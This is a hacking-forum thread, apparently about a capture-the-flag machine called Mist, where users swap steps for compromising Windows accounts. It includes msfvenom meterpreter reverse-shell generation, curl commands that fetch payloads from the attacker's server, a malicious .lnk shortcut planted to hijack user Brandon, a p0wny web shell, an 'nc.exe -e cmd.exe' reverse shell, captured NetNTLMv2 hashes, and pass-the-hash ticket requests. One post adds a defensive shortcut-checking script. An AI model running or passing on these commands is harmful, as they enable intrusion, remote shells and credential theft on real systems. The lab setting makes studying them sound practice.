Posts: 2
Threads: 0
Joined: Apr 2024
(Apr 01, 2024, 03:45 AM)3kyy Wrote: (Mar 31, 2024, 10:28 PM)fl00d777 Wrote: (Mar 31, 2024, 11:56 AM)gtastav Wrote: For brandon:
```powershell
$source = "C:\Users\Brandon.Keywarp\AppData\links"
$destination = "C:\Common Applications"
$sourceFiles = Get-ChildItem -Path $source -Filter *.lnk
foreach ($file in $sourceFiles) {
    $sourceFile = $file.FullName
    $destFile = Join-Path -Path $destination -ChildPath $file.Name
    if (Test-Path -Path $destFile) {
        $sHash = (Get-FileHash -Path $sourceFile -Algorithm SHA256).Hash
        $dHash = (Get-FileHash -Path $destFile -Algorithm SHA256).Hash
        write-host $sHash
        write-host $dHash
        if ($sHash -ne $dHash) {
            Invoke-Item $destFile
            start-sleep -seconds 5
        }
    }
}
```
Means you can upload a crafted .lnk file (to the directory in the code above) to trigger a shell and get the shell as brandon.
Where did you learn this from?
It's link.ps1, when you put "type link.ps1"
![[Image: Captura-de-pantalla-2024-04-01-003936.png]](https://i.ibb.co/bLWLrzt/Captura-de-pantalla-2024-04-01-003936.png)
and yes, this is how we can move to Brandon user...
msfvenom -p windows/x64/meterpreter/reverse_Tcp LHOST=tun0 LPORT=6666 -f exe -o 6666.exe
python3 -m http.server 8888
from htdocs/shell.php run
curl 10.10.14.x:8888/6666.exe -o 6666.exe
then powershell and execute this:
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Notepad.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\6666.exe"
$lnk.Save()
This is going to create a shortcut in Common Applications. So the user Brandon "will click the shortcut" and you can obtain a Brandon shell.
Ok, but how do you read this file in Brandon's directory while on the svc_web account? I get access denied, is there any trick?
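The quoted link.ps1 opens any copied shortcut whose hash differs from the original, which is exactly why a planted .lnk gets launched. As an added defensive example (not code from the thread or the box), the variant below keeps the same hash comparison but resolves where the changed shortcut actually points and refuses to open it unless the target lives under an allow-listed directory and carries a valid Authenticode signature; the allow-list entries are assumptions.

```powershell
# Added example, not the original link.ps1: only launch a changed shortcut
# after checking where it points. Directory names follow the quoted script;
# the allow-listed target roots are assumptions for illustration.
$source      = "C:\Users\Brandon.Keywarp\AppData\links"
$destination = "C:\Common Applications"
$allowedTargetRoots = @("C:\Windows\System32", "C:\Program Files")   # assumption

$shell = New-Object -ComObject WScript.Shell

foreach ($file in Get-ChildItem -Path $source -Filter *.lnk) {
    $destFile = Join-Path -Path $destination -ChildPath $file.Name
    if (-not (Test-Path -Path $destFile)) { continue }

    # Same change detection as the original script.
    $sHash = (Get-FileHash -Path $file.FullName -Algorithm SHA256).Hash
    $dHash = (Get-FileHash -Path $destFile -Algorithm SHA256).Hash
    if ($sHash -eq $dHash) { continue }

    # Resolve the shortcut's real target before doing anything with it.
    $lnk    = $shell.CreateShortcut($destFile)
    $target = $lnk.TargetPath
    if (-not $target -or -not (Test-Path -Path $target -PathType Leaf)) {
        Write-Warning "Refusing to open $destFile : target '$target' does not exist"
        continue
    }

    # Target must sit under one of the allow-listed roots (case-insensitive).
    $underAllowedRoot = $false
    foreach ($root in $allowedTargetRoots) {
        if ($target.StartsWith($root + "\", [System.StringComparison]::OrdinalIgnoreCase)) {
            $underAllowedRoot = $true
        }
    }

    # Target must be signed; an unsigned binary dropped into a web root fails here.
    $sig = Get-AuthenticodeSignature -FilePath $target

    if (-not $underAllowedRoot -or $sig.Status -ne 'Valid') {
        Write-Warning ("Refusing to open {0}: target '{1}' (root ok: {2}, signature: {3}, args: '{4}')" -f `
            $destFile, $target, $underAllowedRoot, $sig.Status, $lnk.Arguments)
        continue
    }

    Invoke-Item $destFile
    Start-Sleep -Seconds 5
}
```

The check deliberately inspects the copied shortcut rather than the source one, because the copy is the file that gets launched; a monitoring rule on the same condition (hash changed and target outside the allowed roots) is what a SOC would alert on instead of the Write-Warning.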
Posts: 96
Threads: 2
Joined: Feb 2024
Hi,
Did anyone get the relaying working with ntlmrelayx and petitpotam.py?
Care to share?
Posts: 28
Threads: 0
Joined: Jan 2024
with the winpeas resource I found this hash from Brandon, has anyone tried to crack it??
I'm stuck here and I don't know how to move forward
If anyone can help, I appreciate it
Hash of Brandon = Version: NetNTLMv2
Hash: Brandon.Keywarp::MIST:1122334455667788:65577ca8f5f7c492f3eb50de678b1922:01010000000000001bea24efe684da017822a14f9161bff00000000008003000300000000000000000000000002000005f523428045377d67a93f9f63357e2f6835903ffb211afcd4982c4efec0113800a00100000000000000000000000000000000000090000000000000000000000
Posts: 1
Threads: 0
Joined: Apr 2024
Could anyone please share how to gain MS01$ hash from the Brandon user? I understand the lateral movement afterwards but nothing is working for this hash?
Posts: 2
Threads: 0
Joined: Apr 2024
Any advice for the Brandon shell? Both meterpreter and classic tcp shell disconnect as soon as the connection is established. I tried the same method as before for svc_web but it doesn't work. Any hint?
Posts: 124
Threads: 1
Joined: Apr 2024
Apr 02, 2024, 04:48 PM
(This post was last modified: Apr 02, 2024, 05:03 PM by jsvensson.)
I got a ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how, with that, do I get the hash for the local admin on ms01?
(Apr 02, 2024, 04:48 PM)jsvensson Wrote: I got ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how with that get hash for local admin for ms01?
never mind already done
Posts: 16
Threads: 3
Joined: Apr 2024
(Apr 02, 2024, 04:48 PM)jsvensson Wrote: I got ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how with that get hash for local admin for ms01?
never mind already done
Any hint on what you did after getTGT? Ticket from getTGT doesn't seem to work with ps/smb/wmiexec
Posts: 26
Threads: 0
Joined: Apr 2024
How do you get the machine hash?
I have a shell for Brandon and svc_web + NTLM hashes of both
Posts: 40
Threads: 2
Joined: Jan 2024
(Mar 31, 2024, 02:58 AM)osamy7592 Wrote: (Mar 31, 2024, 02:46 AM)iNone Wrote: (Mar 31, 2024, 02:42 AM)osamy7592 Wrote: After gaining a shell and becoming svc user .. What is the next step any hint ?
How did you get the shell? You import the module, but what shell do you use and how can I bypass the AV? Because the shell kicks me out.
Ok guys, get a p0wny-shell from here: https://github.com/flozz/p0wny-shell/blo.../shell.php
After that go to http://mist.htb/data/modules .... and so on; after you get shell.php, click on it, ok.
Now you have a shell .. You can forward it to your kali .. First download nc64.exe on kali, after that set up a web
server with python -m http.server and from the p0wny shell write curl http://kali ip:port/nc64.exe -o nc.exe
Now set nc -nlvp 4444 and from the p0wny shell write nc.exe kali ip 4444 -e cmd.exe; now you have a shell on your kali
So any hint after gaining the shell? After I gain p0wny-shell, I add the curl command to download nc64.exe and the shell dies at that moment.
What other payload can I use to get a shell as ms01\svc_web? Any shortcut?
Posts: 6
Threads: 0
Joined: Feb 2024
Got this hash, can't crack it, don't know how to continue from this point
svc_web::MS01:1122334455667788:2a1beddd69c71ca052428592e5d3cbb9:010100000000000069fbc8c3c283da01fecd0ddc57a9967c0000000008003000300000000000000000000000003000005244af53b397216e69d27c37edb6b316715fda182a087e1bf2499435508a5ba60a00100000000000000000000000000000000000090000000000000000000000